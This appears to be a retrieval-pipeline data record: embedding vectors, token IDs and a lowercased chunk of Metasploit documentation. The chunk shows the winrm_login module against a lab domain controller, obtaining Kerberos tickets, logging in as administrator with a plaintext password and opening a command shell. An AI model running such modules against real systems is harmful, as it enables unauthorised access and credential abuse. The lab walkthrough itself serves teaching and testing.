-1.7177972793579102, -0.9026735424995422, 0.1494908332824707, 0.2858295440673828, 0.13297025859355927, -0.03588418290019035, -0.7170276045799255, 0.948680579662323, 0.522577166557312, -0.09484057128429413, 0.35821184515953064, 0.8447762131690979, 0.2176450490951538, -0.4302137494087219, -0.08049655705690384, 1.0019948482513428, -0.172713503241539, -0.701558530330658, 0.4298561215400696, -0.11255235224962234, -0.2438090592622757, -0.04859437048435211, 0.7662941813468933, 0.013783602975308895, 0.3717745542526245, -0.38934946060180664, -0.21792398393154144, 0.046916279941797256, 0.41127705574035645, -0.8094449043273926, 0.31833189725875854, -0.49219343066215515, 0.33568745851516724, 0.16788361966609955, 1.2410311698913574, 0.01599819026887417, -0.001747210742905736, 0.346668004989624, -0.054353781044483185, -0.23317542672157288, -0.4883405268192291, -0.19006387889385223, 1.1168994903564453, 0.6344751715660095, 0.8825116157531738, 0.6179776787757874, 0.31225356459617615, -0.08099846541881561, -0.3372875452041626, 0.7310147285461426, 0.5274666547775269, -0.08892667293548584, 1.1096478700637817, 0.2928258776664734, -0.37543362379074097, -0.6097909808158875, -0.26914483308792114, 0.8395348787307739, 0.23998615145683289, -0.3930302858352661, -1.062885046005249, -0.16297557950019836, -0.2500653862953186, -0.8265151381492615, -0.41556498408317566, 0.09676721692085266, 0.6908226609230042, 0.22681806981563568, -0.17204807698726654, 0.2248806357383728, -0.5860800743103027, -0.8315731883049011, 0.0011665232013911009, -1.1937867403030396, -0.7557215094566345, -0.8667367100715637, 0.23516954481601715, 0.3848736882209778, -0.33672335743904114, 0.6167215704917908, -0.46081387996673584, -0.3353971540927887, 0.1341691017150879, -0.5497410893440247, 1.2250218391418457, 0.5102956891059875, -0.3046494722366333, -0.8832188844680786, 0.2872579097747803, -0.35856789350509644, 0.2329576462507248, -0.6387186050415039, -0.4344121515750885, -0.48221325874328613, 0.22480732202529907, -0.3727598488330841, -0.15447238087654114, 0.6689454317092896, 0.14067891240119934, 0.5806598663330078, -0.1244286447763443, -0.026693006977438927, -0.24216629564762115, 0.2568794786930084, -0.13259297609329224, -0.37593504786491394, 0.5116533637046814, -0.0017008234281092882, 0.009669430553913116, 0.8618809580802917, 0.41497746109962463, -0.8429296612739563, 0.33542484045028687, -0.21243026852607727, 0.6021283864974976, -0.9505661129951477, 0.9626209139823914, 0.4060412645339966, 0.19159190356731415, -0.06599956750869751, -0.45099595189094543, -0.11511500179767609, -0.3930208384990692, -0.3116515874862671, -0.28754183650016785, -0.4236729145050049, 0.3619994521141052, -0.05037744343280792, -0.827475905418396, 0.052945684641599655, -0.010987047106027603, 0.046150244772434235, -0.19268012046813965, -0.3663858473300934, 0.5144386291503906, -0.032167546451091766, 0.4980683922767639, -0.2448682337999344, -0.36817988753318787, 0.14158211648464203, -0.28082093596458435, -0.3341391682624817, -0.6284329295158386, 0.21744304895401, 0.7779771685600281, -0.6421709060668945, 0.38616836071014404, 0.40041202306747437, -0.20968122780323029, -0.0724651962518692, -0.2204471230506897, 0.04057391732931137, -0.02912767045199871, 0.7402679920196533, 0.4500117003917694, -0.34198468923568726, 0.27959033846855164, -1.1370725631713867, -0.283907026052475, 0.22223259508609772, 0.06702201813459396, 0.2761826813220978, 0.28194165229797363, -0.2559109330177307, 0.1216864213347435, -0.11133281141519547, -0.875924289226532, 0.2506765127182007, 0.253817617893219, 0.9297374486923218, -0.4317821264266968, 0.8938403725624084, -0.09810411185026169, -0.09545478969812393, 0.12074530869722366, -0.419109970331192, -0.21630600094795227, 0.743914008140564, -0.25695937871932983, 0.8058371543884277, -0.37922316789627075, 0.20550218224525452, -0.06044180318713188, -0.3877112865447998, 0.36342474818229675, -0.226327046751976, -0.012604746036231518, 0.028925349935889244, -0.5786250829696655, 0.06801051646471024, -0.5488924980163574, 0.3638078570365906, 0.20345403254032135, -0.09108468145132065, -0.13211870193481445, -0.8699647188186646, -0.9417901635169983, 1.172743320465088, 0.4867333471775055, 1.0552936792373657, 0.6119852066040039, 0.1594979166984558, -0.44126710295677185, -0.26941198110580444, 0.4310181438922882, -0.5045968294143677, 0.624076247215271, 0.1663278043270111, 1.3032031059265137, -0.07630384713411331, 0.28145715594291687, -0.5713517665863037, 0.016237637028098106, -0.23329272866249084, 0.3508473038673401, 0.16735312342643738, 0.5075128674507141, -0.8405805826187134, -0.2779964804649353, 0.5530208349227905, -0.34604117274284363, -0.46295714378356934, -0.1634940505027771, -0.43723946809768677, 1.1861335039138794, 0.8859438300132751, -0.8295095562934875, 0.03242551162838936, -0.40839773416519165, 0.2612888216972351, 0.34388473629951477, -0.47383710741996765, -0.5783103704452515, -0.7197779417037964, 0.2686280906200409, -0.8047064542770386, 0.4082789719104767, -0.0719609260559082, -0.10481157898902893, 0.08639029413461685, -0.8491296768188477, -0.17513872683048248, 0.38151130080223083, 0.015061027370393276, -0.6112291216850281, -0.4151735305786133, 0.1269703507423401, 0.6129039525985718, 0.6250997185707092, -0.2595650851726532, -0.3779718279838562, 0.341281920671463, -0.6739701628684998, 0.2955181300640106, -1.4064521789550781, 0.5389218330383301, 0.2773595452308655, -0.2854117751121521, 0.07898097485303879, -0.024030441418290138, -0.2612985670566559, 0.12289726734161377, 0.015135936439037323, 0.5222365856170654, -0.14133352041244507, 0.025554955005645752, 0.7100833058357239, 0.004572418052703142, -0.28697556257247925, 0.5647585988044739, 0.5929281711578369, -0.056615930050611496, -0.07179494947195053, 0.062291182577610016, -0.5509200096130371, 0.1991916447877884, -0.9595928192138672, 0.9708372950553894, -0.17337289452552795, 0.3201223611831665, 0.11259610205888748, -0.06223302707076073, 0.6201613545417786, 0.36544477939605713, 0.0009890218498185277, -0.4805769920349121, -0.594600260257721, 0.05814804509282112, 0.8937282562255859, -0.241964191198349, 0.20915019512176514, -0.11134524643421173, -0.33292317390441895, 0.292692631483078, -0.6369874477386475, -0.591245174407959, -1.0714036226272583, -0.459529846906662, 0.0031140863429754972, 0.17045222222805023, -0.20287738740444183, 0.60172039270401, -0.40933218598365784, -0.9411137700080872, 0.5604385733604431, -0.7505322694778442, 0.12600991129875183, -1.1001936197280884, 0.6026049256324768, -0.9168091416358948, -0.11224409192800522, -0.3570874035358429, 0.3213210701942444, -0.2724711298942566, 0.18904606997966766, -0.03092770092189312, 1.0487924814224243, 0.2658199667930603, -0.4671671688556671, 0.1837492287158966, 0.36169448494911194, 0.12912783026695251, -1.0495635271072388, 0.3726932108402252, 0.9285053014755249, -0.08697917312383652, 0.5180496573448181, 0.17108771204948425, -0.14201021194458008, -0.7713302373886108, -0.6848692893981934, -0.23262210190296173, -0.38818487524986267, -0.04772597551345825, -0.5726646780967712, -0.6581035256385803, -0.5556977391242981, -0.3639744818210602, -0.33070072531700134, -1.5211513042449951, -0.33994466066360474, -0.10537077486515045, -0.5008518099784851, 0.21250931918621063, 0.3751874566078186, -0.23153714835643768, -0.32808175683021545, -0.2665042579174042, 0.47659391164779663, 0.22811490297317505, -0.05601050332188606, -0.13257582485675812, 0.3034687042236328, 0.5103102326393127, -0.04463006556034088, -0.6813005208969116, -0.193869948387146, 0.16020281612873077, -0.1429682970046997, 0.04416799172759056, 0.9498611688613892, 0.07034770399332047, 0.2309102714061737, -0.5377293229103088, 0.42280063033103943, -0.007645403500646353, -0.10256851464509964, -0.5107776522636414, -0.058065567165613174, 0.98470139503479, -0.6038880944252014, 0.5286827087402344, 0.35409489274024963, 0.8109986186027527, 0.4030057191848755, -0.490524023771286, -0.539030909538269, -0.5346704721450806, -0.7643020153045654, -0.8465105891227722, 0.3074587881565094, 0.012090207077562809, -0.4048038721084595, 0.8226041793823242, 0.008390352129936218, 0.17711582779884338, -0.798163652420044, 0.529933750629425, 0.8659550547599792, 0.39161208271980286, 0.26764729619026184, -1.5597620010375977, 0.4301203787326813, 0.4764101803302765, -0.026476921513676643, -0.07547976821660995, -0.403982549905777, -0.24112379550933838, 0.6969038844108582, -0.47626495361328125, -0.17389161884784698, -0.4581807255744934, -0.4237782061100006, 0.6127239465713501, -0.12179341912269592, 0.6166128516197205, -0.108482226729393, -0.6019408702850342, -0.27930718660354614, 0.4921265244483948, -0.27748122811317444, -0.45175039768218994, 0.5534428954124451, 0.601716160774231, 0.9724733233451843, -0.3976684510707855, 0.21908040344715118, -0.38292810320854187, -0.06195778027176857, 0.9292855858802795, -0.16173851490020752, -0.5506675243377686, 0.9015662670135498, 0.07563737779855728, -0.8701391220092773, -0.41016706824302673, -0.32212504744529724, -0.04912813752889633, -0.41358622908592224, -0.05013754591345787, -0.5266597270965576, -0.2899623513221741, -0.004593891557306051, -0.389058381319046, 0.4260537326335907, 0.30112701654434204, 0.47035351395606995, -0.824389636516571, 0.29859575629234314, 0.2509500980377197, 0.6016811728477478, 0.8560011386871338, -0.7998411655426025, -0.052862267941236496, -1.2021877765655518, -0.2589505910873413, 0.325466513633728, 0.7615868449211121, 0.6672554016113281, -0.38355883955955505, 0.45062586665153503, 0.1835198700428009, 0.2661755383014679, 1.0896642208099365, 0.0017985755112022161, 0.22826933860778809, 0.920006513595581, -0.18168257176876068, -0.8610572218894958, -0.5023564696311951, 0.23017452657222748, -0.0822983831167221, 0.7407302856445312, -0.4980705976486206, 0.008545278571546078, -0.1842980533838272, 0.25185519456863403, -0.3543805181980133, -1.0171802043914795, -0.8650002479553223, -0.8367639183998108, -0.34410881996154785, 0.09304637461900711, 0.18226134777069092, 0.21703851222991943, 0.08002672344446182, -0.48278868198394775, -0.3339575529098511, -0.6517425775527954, -0.002494571963325143, -0.7726130485534668, -0.11327014863491058, -0.40411892533302307, 0.7303695678710938, -0.9953113198280334, -0.6637871861457825, -0.5159823894500732, 0.6152700781822205, -0.3493949770927429, -0.7698506116867065, -0.5627356767654419, -0.1847318708896637, -0.23904529213905334, 0.6788234710693359, -0.5818657279014587, -0.14619825780391693, 0.260916143655777, -0.7097588777542114, 0.18301475048065186, 0.5886893272399902, -0.5317254662513733, 0.41277629137039185, 0.3615161180496216, 0.14291131496429443, 0.5268398523330688, -0.40214279294013977, -0.27975860238075256, 0.20971597731113434, -0.0018976323772221804, 0.5365117192268372, 0.009213749319314957, -0.14041617512702942, -0.03417367488145828, -0.14507314562797546, -0.5724820494651794, -0.34756264090538025, -0.6658992767333984, -0.14962919056415558, 0.015180624090135098, 0.15681219100952148, -0.027750227600336075, 1.057307243347168, 0.08952383697032928, -0.02723243646323681, -0.7442902326583862, 0.5794550180435181, 0.3439576327800751, -0.4966307282447815, -0.16998478770256042, 0.21224594116210938, 0.41139450669288635, -0.8119175434112549, -0.12324022501707077, 0.5779687762260437, -0.5962752103805542, 0.20217514038085938, -0.07661499828100204, 0.004304118454456329, -0.47105661034584045, -0.3290276825428009, 0.12411834299564362, 0.6308351755142212, 0.7572627067565918, -0.213814839720726, 0.2997497320175171, -0.17082852125167847, -0.48759332299232483, 0.4574982225894928, -1.0970088243484497, -0.39258456230163574, 0.06974727660417557, -0.29987820982933044, 0.38232147693634033, -0.4394850432872772, -0.824374258518219, 0.2922493815422058, 0.342229425907135, -0.5783905386924744, 0.15191811323165894, 0.10456138849258423, 0.4220951199531555, 1.1300287246704102, -0.3051219582557678, -0.39807024598121643, -0.043185751885175705, 0.45433977246284485, -0.8812673091888428, -1.5543173551559448, -0.004539262969046831, 0.5172954797744751, 0.746336817741394, 0.013197056949138641, -0.46857279539108276, 0.3042037785053253, -0.16865158081054688, -0.10803406685590744, -0.3110654056072235, 0.3658333122730255, -0.4390314519405365, 0.33421963453292847, 0.02099657990038395, 0.6266968846321106, -0.43338897824287415, -0.2026868611574173, 0.2539149820804596, -0.04064471274614334, -0.2290176898241043, 0.5737618207931519, 0.2857888638973236, -0.13549356162548065, 0.7744029760360718, 0.3156825304031372, 0.20364296436309814, -0.3816957175731659, 0.02069033309817314, -0.28309693932533264, -0.1743977665901184, 0.853750467300415, 0.3576516807079315, 0.14597566425800323, 0.7884973287582397, 0.8737877607345581, -0.6490069031715393, -0.2032281458377838, 0.816096842288971, 0.349772185087204, -0.6388300061225891, 0.23801566660404205, -0.07781640440225601, 0.09001966565847397, 0.11582223325967789, -0.02018052712082863, -0.017995448783040047, 0.4382894039154053, 0.3194139897823334, 0.3446347117424011, 0.10353358834981918, 1.0530635118484497, -0.5716248750686646, 0.49880358576774597, -0.18700096011161804, -0.4455437958240509, 0.029034143313765526, 0.04917573928833008, -0.4194222688674927, 0.43287503719329834, 0.9641366004943848, 0.7243619561195374, -0.08726498484611511, 0.4865075945854187, -0.07775770127773285, 0.12463270872831345, 0.6518299579620361, 0.17942099273204803, -1.0233099460601807, 0.26608774065971375, -0.21650968492031097, 0.191240593791008, -0.4419851303100586, 0.4284699559211731, -0.0716620460152626, -0.3447354733943939, 0.7662435173988342, 0.19567549228668213, 0.32206153869628906, -0.6920265555381775, 0.5687107443809509, -0.5099858045578003, 0.3628152906894684, 0.533614456653595, -0.04558400809764862, -0.2518991529941559, 0.646773099899292, 0.3818024694919586, 0.6855097413063049, 0.18692892789840698, 1.3121453523635864, 0.21744194626808167, 0.360736221075058, 0.2094920575618744, -0.09709571301937103, -0.7702398896217346, 0.07803714275360107, 0.018925495445728302, -0.07856271415948868, 0.6239951252937317, -0.615841269493103, 0.7060734033584595, 0.00702952966094017, -0.4194352328777313, -0.5549627542495728, 0.5238986015319824, -0.5996587872505188, -0.811291515827179, 1.0385700464248657, -0.16657648980617523, -0.1921992003917694, 0.34108585119247437, 0.4562169909477234, 0.28000423312187195, 0.7812955379486084, -0.4806942939758301, -0.43068787455558777, -0.7253929376602173, -0.6250496506690979, -0.13914932310581207, 0.7493119239807129, -0.5035707950592041, 0.2218170017004013, -0.4791499376296997, -1.285341739654541, -0.337837815284729, -0.15706707537174225, -0.24967476725578308, -0.6647889614105225, 0.014674895443022251, 1.0178303718566895, 0.37257951498031616, 0.2942540645599365, -0.41186392307281494, -0.47888192534446716, 0.42361125349998474, 0.9916972517967224, 0.13009080290794373, 0.6487849354743958, 0.07736136764287949, -0.2654211223125458, 0.19759660959243774, -0.46584996581077576, 0.5537843704223633, 0.12694649398326874, 0.24959467351436615, 0.45654499530792236, -0.03592658042907715, -0.741939902305603, -0.043948713690042496, -0.11629439145326614, -0.2075665146112442, 0.5910168290138245, -0.26043835282325745, -1.0818839073181152, 0.25579699873924255, -0.47898679971694946, 0.16649465262889862, 0.005524068605154753, -0.22371186316013336, 0.5044680833816528, -0.0013281949795782566, -0.21600225567817688, -0.9677686095237732, 4.153956890106201, 0.5592071413993835, -0.1099461168050766, 0.5676034092903137, 0.07644415646791458, 0.626277506351471, 1.339397668838501, -0.758048415184021, 0.5820297002792358, -0.26389288902282715, 0.3286695182323456, 0.39673319458961487, 0.3776012063026428, 0.21077273786067963, 1.1283891201019287, 0.6184418797492981, -0.7546684741973877, 0.4131729006767273, 0.6338023543357849, -1.034321904182434, -0.9592621326446533, 0.30402079224586487, -0.5219982862472534, 0.985133707523346, 0.0656631737947464, 0.5702613592147827, 0.4559659957885742, -1.009667158126831, -0.32984742522239685, -0.39410120248794556, -0.189435675740242, -0.5546507239341736, -0.1449728161096573, -0.5670097470283508, -0.9446530342102051, -0.35988283157348633, 0.0884966179728508, -1.209509253501892, -0.05032966658473015, 0.02922479435801506, 0.6030905246734619, -0.0364556759595871, 0.36455032229423523, -0.2554713785648346, 0.26191097497940063, 0.38560858368873596, -0.8898776769638062, -0.2711240351200104, 0.8031834363937378, -1.0071243047714233, 0.6399444937705994, 0.1043199971318245, 0.611438512802124, 0.2545071840286255, -0.675282895565033, -0.04393241927027702, 0.6691831350326538, -0.2627565860748291, -0.007246749475598335, -0.2314782440662384, 0.6940357685089111, -0.5912681818008423, 0.14487794041633606, -0.4443560838699341, -0.983820915222168, 0.8731333613395691, -0.18315017223358154, -0.6161246299743652, -0.2119511514902115, -0.5352203249931335, -0.04188212379813194, -0.2717320919036865, -0.6215239763259888, -0.36250168085098267, 1.2504897117614746, -0.12345520406961441, -0.24345754086971283, -0.21871604025363922, 0.8465056419372559, -0.34575769305229187, 0.2440185695886612, -0.39585551619529724, -1.3799129724502563, 0.2773170471191406, 0.33510300517082214, 0.20969533920288086, -0.323894739151001, -0.8984796404838562, -0.38735702633857727, 0.5133751630783081, 0.22294892370700836, 0.23539409041404724, -0.656723141670227, 0.03832248970866203, 0.40438878536224365 ]
[ 1013, 2663, 10867, 1013, 2663, 10867, 1035, 8833, 2378, 2448, 24471, 2140, 16457, 1027, 2753, 5310, 1035, 5371, 1027, 1012, 1013, 5198, 1012, 19067, 2102, 3413, 1035, 5371, 1027, 1012, 1013, 2773, 9863, 1012, 19067, 2102, 26128, 1011, 2486, 22496, 1999, 1037, 4942, 7159, 1024, 2224, 26221, 1013, 2663, 10867, 1013, 2663, 10867, 1035, 8833, 2378, 2448, 28744, 2099, 1024, 1013, 2484, 1024, 8299, 1024, 1013, 1013, 5310, 1024, 3413, 1030, 17613, 1012, 16923, 1012, 19015, 1012, 1014, 1024, 5354, 27531, 16457, 1027, 2753, 2448, 28744, 2099, 1024, 1013, 2484, 1024, 8299, 1024, 1013, 1013, 5310, 1030, 17613, 1012, 16923, 1012, 19015, 1012, 1014, 1024, 5354, 27531, 16457, 1027, 2753, 3413, 1035, 5371, 1027, 1012, 1013, 2773, 9863, 1012, 19067, 2102, 2663, 10867, 4642, 11927, 2080, 15389, 15275, 10954, 2114, 1037, 3645, 4539, 1024, 2224, 26221, 1013, 2663, 10867, 1013, 2663, 10867, 1035, 4642, 2094, 2448, 24471, 2140, 4642, 2094, 1027, 1005, 23281, 4328, 1025, 12997, 8663, 8873, 2290, 1025, 2291, 2378, 14876, 1005, 2663, 10867, 8833, 2378, 5219, 10128, 2017, 2031, 9398, 22496, 1996, 26221, 1013, 2663, 10867, 1013, 2663, 10867, 1035, 8833, 2378, 11336, 2097, 2330, 1037, 18804, 13102, 4135, 4183, 5219, 2005, 2017, 1024, 2224, 26221, 1013, 2663, 10867, 1013, 2663, 10867, 1035, 8833, 2378, 2448, 24471, 2140, 2742, 1024, 5796, 2546, 2575, 9830, 1006, 26221, 1013, 2663, 10867, 1013, 2663, 10867, 1035, 8833, 2378, 1007, 1028, 2448, 24471, 2140, 1031, 999, 1033, 2053, 3161, 16962, 1011, 1011, 13675, 14728, 19909, 2951, 2097, 2025, 2022, 5552, 999, 1031, 1009, 1033, 17613, 1012, 16923, 1012, 13138, 1012, 16621, 1024, 5354, 27531, 1011, 8833, 2378, 3144, 1024, 2573, 12516, 1032, 5310, 1024, 3413, 1031, 1008, 1033, 3094, 5806, 5219, 1021, 2441, 1006, 17613, 1012, 16923, 1012, 13138, 1012, 1015, 1024, 5388, 2575, 2581, 2509, 1011, 1028, 17613, 1012, 16923, 1012, 13138, 1012, 16621, 1024, 5354, 27531, 1007, 2012, 16798, 2475, 1011, 5840, 1011, 2603, 6185, 1024, 4029, 1024, 4090, 1009, 5890, 8889, 1031, 1008, 1033, 11728, 1015, 1997, 1015, 6184, 1006, 2531, 1003, 3143, 1007, 1031, 1008, 1033, 9830, 11336, 7781, 2949, 5796, 2546, 2575, 9830, 1006, 26221, 1013, 2663, 10867, 1013, 2663, 10867, 1035, 8833, 2378, 1007, 1028, 6521, 1011, 1045, 1011, 1015, 1031, 1008, 1033, 3225, 8290, 2007, 1021, 1012, 1012, 1012, 7513, 3645, 1031, 2544, 2184, 1012, 1014, 1012, 16065, 2683, 2509, 1033, 1006, 1039, 1007, 2355, 7513, 3840, 1012, 2035, 2916, 9235, 1012, 1039, 1024, 1032, 5198, 1032, 5310, 1028, 17710, 20473, 2891, 27280, 3207, 22081, 2006, 1996, 17710, 20473, 2891, 3563, 5724, 3415, 2024, 8832, 1999, 17710, 20473, 2891, 2326, 27280, 26915, 1037, 2663, 10867, 5219, 1024, 5796, 2546, 2575, 1028, 2224, 9830, 1013, 26221, 1013, 2663, 10867, 1013, 2663, 10867, 1035, 8833, 2378, 5796, 2546, 2575, 9830, 1006, 26221, 1013, 2663, 10867, 1013, 2663, 10867, 1035, 8833, 2378, 1007, 1028, 2448, 1054, 15006, 2102, 1027, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 5310, 18442, 1027, 8911, 20786, 1027, 1052, 2549, 1002, 1002, 1059, 2692, 4103, 2663, 10867, 1024, 1024, 8740, 2705, 1027, 17710, 20473, 2891, 5884, 8663, 13181, 10820, 25032, 14122, 1027, 17613, 1012, 16923 ]
metasploit
13.txt
1
. 123. 13 winrm : : rhostname = dc3. demo. local domain = demo. local [ + ] 192. 168. 123. 13 : 88 - received a valid tgt - response [ * ] 192. 168. 123. 13 : 5985 - tgt mit credential cache ticket saved to / users / user /. msf4 / loot / 20230118120604 _ default _ 192. 168. 123. 13 _ mit. kerberos. cca _ 451736. bin [ + ] 192. 168. 123. 13 : 88 - received a valid tgs - response [ * ] 192. 168. 123. 13 : 5985 - tgs mit credential cache ticket saved to / users / user /. msf4 / loot / 20230118120604 _ default _ 192. 168. 123. 13 _ mit. kerberos. cca _ 889546. bin [ + ] 192. 168. 123. 13 : 88 - received a valid delegation tgs - response [ + ] 192. 168. 123. 13 : 88 - received ap - req. extracting session key... [ + ] 192. 168. 123. 13 : 5985 - login successful : demo. local \ administrator : p4 $ $ w0rd [ * ] command shell session 1 opened ( 192. 168. 123. 1 : 50722 - > 192. 168. 123. 13 : 5985 ) at 2023 - 01 - 18 12 : 06 : 05 + 0000 [ * ] scanned 1 of 1 hosts ( 100 % complete ) [ * ] auxiliary module execution completed msf6 auxiliary ( scanner / winrm / winrm _ login ) > sessions - i - 1 [ * ] starting interaction with 1... microsoft windows [ version 10. 0. 14393 ] ( c ) 2016 microsoft corporation. all rights reserved. c : \ users \ administrator > [SEP]
[ 0.22932635247707367, -0.6936253309249878, -0.15037782490253448, 0.35683631896972656, -0.26905694603919983, -0.5015801787376404, -0.2631489038467407, 0.13588890433311462, -0.5774974822998047, 0.3768753409385681, 0.03052046149969101, 0.2343273013830185, 0.6145638227462769, -0.3024529218673706, -0.747239887714386, 0.14095212519168854, 0.6630799174308777, 0.013800404034554958, -0.11279332637786865, -0.1365465372800827, 0.4091726243495941, 0.5967301726341248, -0.9168729186058044, -0.07206554710865021, -0.36108162999153137, 0.19303834438323975, 0.15818580985069275, 0.1560271680355072, 0.9146884679794312, -0.22628211975097656, -0.3720795214176178, -0.245114266872406, 0.3160073757171631, -0.09240411967039108, -0.06683945655822754, 0.12180221825838089, 0.4494854509830475, -0.22058789432048798, -0.5418630242347717, -0.9287466406822205, -0.011139732785522938, 0.20420485734939575, -0.03488779813051224, -0.48286324739456177, -0.877968966960907, -0.04435399919748306, -0.38132885098457336, 0.13060671091079712, 0.4759751260280609, -0.5270653367042542, 0.07112643122673035, 0.6949110627174377, 0.1434452384710312, -0.6926600933074951, -0.09345392137765884, -0.5082574486732483, -0.3273486793041229, -0.35913145542144775, -0.300839900970459, -0.4721957743167877, 0.20263443887233734, 0.3138258159160614, -0.39584627747535706, -0.3658742308616638, 0.2820996344089508, 0.4608668088912964, 0.12647747993469238, 0.21017982065677643, -0.3444553315639496, -0.42215996980667114, 0.3617646098136902, 0.12056544423103333, -0.7443438172340393, -0.25778472423553467, -0.3997538685798645, 0.5516636371612549, 0.3382154405117035, 0.0032929368317127228, -0.13245059549808502, 0.7795149087905884, 0.18865221738815308, 0.5938253402709961, 0.19023187458515167, -1.0195754766464233, -0.050798166543245316, -0.27597251534461975, 1.1684333086013794, 0.491790235042572, -0.11299323290586472, -0.21780218183994293, 0.06071487069129944, 0.10293508321046829, -0.46207231283187866, -0.5809304118156433, -0.032232657074928284, 0.695168673992157, 0.14146298170089722, 0.560240626335144, -0.4006674289703369, -0.12620499730110168, -0.009353223256766796, 0.973997950553894, -0.3323599398136139, 0.31114649772644043, 0.2205003947019577, 0.06107771769165993, 0.5763324499130249, -0.3043540418148041, -0.3876059055328369, -0.4605735242366791, 0.6334173679351807, -0.32950833439826965, 0.14817078411579132, -0.2386641800403595, 0.012620480731129646, 0.4643121659755707, -0.15871916711330414, -0.005194295663386583, 0.30727189779281616, 0.17135630548000336, 0.46955230832099915, -1.3881981372833252, 0.06932626664638519, -0.31682851910591125, 0.32347503304481506, -0.69658362865448, 0.07082383334636688, 0.24519549310207367, -0.28410622477531433, -0.5179778337478638, -0.024325918406248093, 0.12134648114442825, 0.0900249183177948, -0.031016096472740173, 0.6997841000556946, 0.8004190921783447, -0.08894842118024826, 0.11431538313627243, 0.5918653607368469, -0.20605634152889252, 0.3906610906124115, 0.3269893229007721, 0.29326632618904114, 1.0480355024337769, -0.03716500848531723, -0.05885734036564827, -0.025947393849492073, 0.5109912753105164, -0.6727405786514282, 0.18325519561767578, -0.5467424392700195, -0.4264026880264282, -0.05278781056404114, 0.46267709136009216, 0.2807272970676422, -0.021344080567359924, -0.24652208387851715, 0.45685628056526184, -0.6084526777267456, 0.3595762252807617, -0.23847916722297668, 0.5015934109687805, -0.489228755235672, 0.41423219442367554, 0.022905806079506874, 0.2414080798625946, 0.47382602095603943, -1.1515178680419922, -0.32311102747917175, -0.25557518005371094, 0.9492491483688354, -0.35229071974754333, -0.04317018762230873, 0.3072460889816284, 0.5212194323539734, -0.11311081796884537, -0.15531037747859955, 0.7902417182922363, 0.5174841284751892, 0.08676306903362274, -0.7978390455245972, 0.15808020532131195, 0.6130983233451843, 0.008557645604014397, 0.33421796560287476, 0.0984821617603302, 0.16281379759311676, -0.11463290452957153, -0.6034510135650635, -0.13242311775684357, 0.5597617626190186, 0.2128019779920578, -0.37751033902168274, 0.36569666862487793, 0.10256233811378479, 0.42572182416915894, -0.7115885019302368, 0.15231168270111084, -0.06620438396930695, -0.6245750784873962, -0.5743241906166077, 0.12198720127344131, -0.20785072445869446, 0.245136559009552, 0.5105009078979492, 0.09605644643306732, 0.7744158506393433, 0.3627021312713623, -0.10741971433162689, 0.09608712047338486, 0.8086608648300171, 0.2614969313144684, 0.10757608711719513, -0.25379830598831177, 0.8844478130340576, -0.2897137403488159, -0.24135930836200714, 0.4879034757614136, 0.3222731053829193, -0.010799901559948921, -0.11847186833620071, 1.1704732179641724, -0.27695080637931824, 0.31404560804367065, -0.48691025376319885, 0.05858488008379936, -0.5432153940200806, 1.2121469974517822, 0.03286338225007057, 0.4927193820476532, 0.28504037857055664, 0.31821268796920776, 0.025243885815143585, 1.510081171989441, 0.07357731461524963, 0.1675235629081726, 0.9618929028511047, 0.2836546301841736, 0.01298261247575283, 0.10432174056768417, -0.10553664714097977, -0.017033372074365616, 0.3867027163505554, 0.09146914631128311, 0.5191845297813416, 0.4677623212337494, -0.3239452838897705, -0.13793379068374634, 0.15804918110370636, 0.24103568494319916, -0.9230493307113647, 0.9016074538230896, 0.22129666805267334, -0.023804716765880585, -0.5080894231796265, -0.6925882697105408, -0.04903796315193176, 0.4574228823184967, -0.6960718631744385, -0.7394036054611206, 0.27910271286964417, -0.4302709996700287, -1.0875204801559448, -0.16867251694202423, -0.16979916393756866, 0.2060563713312149, 0.3506539463996887, -0.36550959944725037, 0.07800409197807312, -0.3299585282802582, -1.0144286155700684, -0.04915403947234154, -0.5666801333427429, 0.101761095225811, -0.7198734283447266, 0.23399443924427032, 0.9984760880470276, -0.3174062669277191, 0.2995755076408386, -0.8289396166801453, 0.2955437898635864, 0.19496291875839233, -0.008452320471405983, 0.8421573638916016, 0.1442791074514389, 0.15505649149417877, -0.41970542073249817, -0.17070525884628296, -0.3564234673976898, -0.12785159051418304, -1.1153693199157715, 0.696908175945282, -0.39003410935401917, 0.19591914117336273, 0.3262704014778137, -0.6167569756507874, -0.009611384943127632, 0.2459648996591568, 0.7155143022537231, 0.06355277448892593, -0.6412647366523743, 0.6332672834396362, 0.4241080582141876, -0.34503456950187683, -0.19934703409671783, 0.1736506223678589, 0.09107577055692673, -0.010533574037253857, 0.44172221422195435, 0.3942495286464691, -0.39786872267723083, 0.5121885538101196, 0.5084194540977478, -0.0023087498266249895, -1.1530102491378784, 1.287266492843628, 0.7699570059776306, -0.144169420003891, -0.4474119246006012, -0.9440819621086121, -0.23163767158985138, 0.1817307323217392, -0.2623540163040161, -0.648159384727478, -0.481809139251709, 0.45990267395973206, -0.5569396018981934, -0.5832256078720093, 0.6870153546333313, -0.845905065536499, -0.3979268968105316, -0.12667220830917358, -0.19098056852817535, 0.07218655198812485, -0.42118170857429504, 0.7477614283561707, -1.1538324356079102, -0.6481027603149414, 0.0661163479089737, -0.00798814743757248, 0.35215631127357483, -0.90517657995224, 0.3730413615703583, 0.06945503503084183, -0.19290059804916382, -0.41537052392959595, 0.6122846007347107, -0.5758559107780457, -0.009649739600718021, -0.3292418420314789, 0.515009880065918, 0.03546185791492462, 0.37529271841049194, 0.2790825664997101, 0.25576844811439514, 1.081101655960083, -0.6203118562698364, 0.10391728579998016, 0.04151272401213646, 0.5305919647216797, 0.49018052220344543, -0.17730306088924408, -0.421408087015152, 0.2082032859325409, -0.23687675595283508, -0.7886968851089478, -0.2025805413722992, 0.30338844656944275, 1.0980890989303589, -1.3932260274887085, 0.223576158285141, -0.22325386106967926, 0.3400745987892151, -0.14909890294075012, 0.16718976199626923, -0.049713827669620514, 0.66813063621521, -0.355512797832489, 0.44903838634490967, -0.07530808448791504, -0.05674716457724571, 0.5286429524421692, 0.04643087461590767, 0.5289219617843628, -0.0903308093547821, -0.019001655280590057, -0.42366352677345276, -0.2039772868156433, 0.19873030483722687, -0.13999414443969727, -0.15994040668010712, -0.08601744472980499, -0.26911309361457825, 0.041115887463092804, -0.734334409236908, -0.6275678873062134, 0.8648775219917297, 0.7535887360572815, 0.9214610457420349, 0.7491586804389954, 0.4629365801811218, -0.16949035227298737, 0.1279381662607193, 0.3860679566860199, -0.45462027192115784, -0.21573218703269958, -0.5897073149681091, 1.1225836277008057, 0.16622017323970795, 0.268035888671875, -0.26781803369522095, 0.3746073842048645, 